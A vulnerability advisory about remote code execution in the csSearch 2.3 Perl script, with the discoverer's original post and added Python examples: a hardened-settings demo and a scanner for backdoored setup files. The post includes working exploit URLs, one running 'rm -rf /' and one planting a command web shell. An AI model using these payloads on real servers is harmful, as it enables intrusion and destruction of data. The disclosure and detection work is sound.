csSearch Perl-based Search Engine Software Lets Remote Users Execute Arbitrary Perl Scripts on the System
|
Date: Mar 26 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 2.3
|
Description: A vulnerability was reported in the csSearch Perl-based search engine script. A remote user can execute arbitrary Perl code, and therefore arbitrary commands, on the server.
It is reported that a remote user can cause arbitrary configuration data to be written to the 'setup.cgi' file. csSearch stores its configuration in this file as Perl code and eval()s it to load the settings each time the script runs, so whatever a remote user writes there is executed as Perl.
The 'savesetup' command performs no access check, so a remote user can invoke the following type of URL to store Perl code that will be executed the next time the search engine runs:
csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE
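The write-then-eval design described above, modelled as an added Python example. It is not csSearch's Perl code: the handler names, the three setting names and the admin-session flag are assumptions chosen for illustration. The vulnerable pair writes a request parameter straight into a file that is later executed, as csSearch does with 'setup.cgi'; the hardened pair requires an authorised session, accepts only known, typed settings and stores them as JSON, which is parsed rather than executed.

```python
"""
Added illustration of the csSearch flaw class, written in Python rather
than the script's own Perl. It is not csSearch code: the handler names,
the three setting names and the admin-session flag are assumptions.
The vulnerable pair writes a request parameter into a file that is later
executed (as csSearch does with setup.cgi and eval); the hardened pair
requires an authenticated admin, accepts only known typed settings and
stores them as JSON, which is parsed, never executed.
"""
import json
import os
import tempfile


# ---- Vulnerable pattern: settings stored as code, no access control ----
def vulnerable_save_setup(setup_path, params):
    # Anyone who can reach the script can write; the raw parameter value
    # becomes the entire body of the settings file.
    with open(setup_path, "w") as f:
        f.write(params["setup"])


def vulnerable_load_setup(setup_path):
    # The settings file is executed to load it, so attacker-supplied text
    # runs as code (Python exec here, Perl eval in csSearch).
    config = {}
    with open(setup_path) as f:
        exec(f.read(), {}, config)
    return config


# ---- Hardened pattern: settings are data, writes need authorization ----
ALLOWED_SETTINGS = {"title": str, "results_per_page": int, "index_path": str}


def hardened_save_setup(setup_path, params, session_is_admin):
    if not session_is_admin:
        raise PermissionError("savesetup requires an authenticated admin")
    config = {}
    for key, cast in ALLOWED_SETTINGS.items():
        if key in params:
            config[key] = cast(params[key])  # whitelisted, typed fields only
    # Unknown keys, including a free-form "setup" blob, are silently dropped.
    with open(setup_path, "w") as f:
        json.dump(config, f)


def hardened_load_setup(setup_path):
    with open(setup_path) as f:
        return json.load(f)  # parsed as data; cannot execute anything


def demo():
    """Run both handlers against a constructed malicious request."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "setup.cgi")
        # Constructed attacker request: the "setup" value is code that
        # records where the script runs (a harmless stand-in for a shell).
        attack = {"setup": "title = 'Search'\nimport os\nleaked = os.getcwd()"}

        vulnerable_save_setup(path, attack)
        cfg = vulnerable_load_setup(path)
        attacker_code_ran = cfg.get("leaked") == os.getcwd()

        try:
            hardened_save_setup(path, attack, session_is_admin=False)
            anonymous_blocked = False
        except PermissionError:
            anonymous_blocked = True

        legit = dict(attack, title="Search", results_per_page="25")
        hardened_save_setup(path, legit, session_is_admin=True)
        saved = hardened_load_setup(path)
    return attacker_code_ran, anonymous_blocked, saved


if __name__ == "__main__":
    print(demo())
```

The two changes are independent and both are needed: the access check stops anonymous writes, and storing settings as data removes the code path that turns any future write bug into remote code execution. In a real deployment the settings file should also not be a .cgi file reachable under the web root.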
|
Impact: A remote user can execute arbitrary Perl code on the server.
|
Solution: The vendor has released a fixed version (2.5), available at:
http://www.cgiscript.net/download/download.htm
|
Vendor URL: www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=7
|
Cause: Access control error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Underlying OS Comments: Perl-based
|
Reported By: Steve Gustin <stegus1@yahoo.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Mon, 25 Mar 2002 14:47:23 -0800 (PST)
From: Steve Gustin <stegus1@yahoo.com>
Subject: CGIscript.net - csSearch.cgi - Remote Code Execution (up to 17,000 sites vulnerable)
|
CGIscript.net - csSearch.cgi - Remote Code Execution
(up to 17,000 sites vulnerable)
---------------------------------------------------------------------
Name : csSearch.cgi - Remote Code Execution
Date : March 25, 2002
Product : csSearch
Version : 2.3 (vulnerable)
Vuln Type : Access Validation Error
Severity : HIGH RISK
Vendor : WWW.CGIscript.NET, LLC.
Homepage : http://www.cgiscript.net/
DISCUSSION:
---------------------------------------------------------------------
csSearch is a free perl cgi search script developed by
Mike Barone and Andy Angrick. According to the website
(cgiscript.net) over 17,000 people have downloaded
csSearch.
csSearch stores its configuration data as perl code
in a file called "setup.cgi" which is eval()uated by
the script to load it back into memory at runtime.
Due to an Access Validation Error, any user can cause
configuration data to be written to "setup.cgi" and
therefore execute arbitrary perl code on the server.
The paid version of this script, csSearch Pro, may
also be vulnerable.
EXPLOIT:
---------------------------------------------------------------------
Configuration data is saved with the following URL.
Note that any perl code would need to be URL encoded.
csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE
For example, the classic "rm -rf /" example would be
as follows:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`
Here's something a little more interesting, less than
300 bytes of code that turns csSearch into a remote
web shell of sorts.
*ShowSearchForm = *Login = sub {
print "<form method=post action=csSearch.cgi>Enter Command (eg: ls -l)<br>";
print "<input type=text name=cmd size=99> ";
print "<input type=submit value=Execute><hr><xmp>";
$in{'cmd'} && print `$in{'cmd'} 2>&1`;
exit;
};
URL Encoded as:
csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;};
IMPACT:
---------------------------------------------------------------------
Because of the high number of users who have
downloaded this script (over 17,000 according to
cgiscript.net) and the fact that search engines can
easily be used to identify sites with the unique
"csSearch.cgi" script name, the risk posed by this
flaw is very high indeed.
SOLUTION:
---------------------------------------------------------------------
Vendor has released a new version, csSearch 2.5, which
patches the flaw.
ISPs and Web hosts may want to consider searching for
this script on their servers ("csSearch.cgi") and
disabling it or advising their customers of the risk
until they can install the patched version.
DISCLAIMER
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.
FEEDBACK:
---------------------------------------------------------------------
stegus1@yahoo.com
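A host-side sweep of the kind the SOLUTION section above suggests, as an added Python example that is neither the advisory's nor cgiscript.net's code. It assumes 'setup.cgi' sits in the same directory as 'csSearch.cgi' and, per the report, normally holds only Perl assignment statements; the benign-line grammar and the suspicious-construct list are heuristics chosen here, not documented csSearch format, and the sample files are constructed.

```python
"""
Added example, not code from the advisory or from cgiscript.net: walk a
web root, find every csSearch.cgi, and flag a setup.cgi beside it that
contains anything other than plain configuration assignments.
Assumptions: setup.cgi lives in the same directory as csSearch.cgi, and a
legitimate one holds only `$name = ...;` / `@name = (...);` lines,
comments and a trailing `1;`. Both are heuristics, not documented format.
"""
import os
import re
import tempfile

SCRIPT_NAME = "csSearch.cgi"
SETUP_NAME = "setup.cgi"

# Constructs a settings-only file should never contain. The typeglob and
# request-parameter patterns mirror the web-shell payload in the report.
SUSPICIOUS = [
    (r"`", "backtick command"),
    (r"\bsub\s*\{", "anonymous sub"),
    (r"(^|[^\w$@%])\*\w+\s*=", "typeglob assignment"),
    (r"\b(system|exec|open|unlink|fork|eval)\s*\(", "dangerous builtin"),
    (r"\$\w+\{['\"]?cmd", "request-driven command"),
]

# Benign: blank, comment, a single-line scalar/array/hash assignment, or 1;
BENIGN_LINE = re.compile(r"^\s*(#.*|[$@%]\w+\s*=\s*[^;`]*;\s*|1;\s*)?$")


def inspect_setup(text):
    """Return (line number, reason) pairs for every non-settings line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        reasons = [label for pattern, label in SUSPICIOUS if re.search(pattern, line)]
        if not reasons and not BENIGN_LINE.match(line):
            reasons.append("unexpected statement")
        findings.extend((lineno, r) for r in reasons)
    return findings


def sweep(web_root):
    """Map each directory holding csSearch.cgi to its setup.cgi findings
    (None when the script is present but setup.cgi is missing)."""
    report = {}
    for dirpath, _dirs, files in os.walk(web_root):
        if SCRIPT_NAME not in files:
            continue
        if SETUP_NAME not in files:
            report[dirpath] = None
            continue
        with open(os.path.join(dirpath, SETUP_NAME), encoding="utf-8", errors="replace") as f:
            report[dirpath] = inspect_setup(f.read())
    return report


# Constructed sample files (not real csSearch output).
CLEAN_SETUP = '$title = "Site Search";\n@index = ("/home/site/html");\n$results = 10;\n1;\n'
BACKDOORED_SETUP = CLEAN_SETUP + (
    "*ShowSearchForm = *Login = sub { print `$in{'cmd'} 2>&1`; exit; };\n"
)


def demo():
    """Build a small web root with one clean and one backdoored install."""
    with tempfile.TemporaryDirectory() as root:
        for site, setup in (("siteA", CLEAN_SETUP), ("siteB", BACKDOORED_SETUP)):
            d = os.path.join(root, site, "cgi-bin")
            os.makedirs(d)
            with open(os.path.join(d, SCRIPT_NAME), "w") as f:
                f.write("#!/usr/bin/perl\n")
            with open(os.path.join(d, SETUP_NAME), "w") as f:
                f.write(setup)
        os.makedirs(os.path.join(root, "siteC", "cgi-bin"))  # no csSearch here
        report = sweep(root)
        return {os.path.relpath(k, root).replace(os.sep, "/"): v
                for k, v in report.items()}


if __name__ == "__main__":
    for where, findings in demo().items():
        print(where, findings)
```

Run it against a real web root by calling sweep() on that path; any install whose findings are non-empty, or whose setup.cgi is missing, should be taken offline until csSearch 2.5 is in place, since a clean-looking file only shows that the hole has not yet been used, not that it is closed.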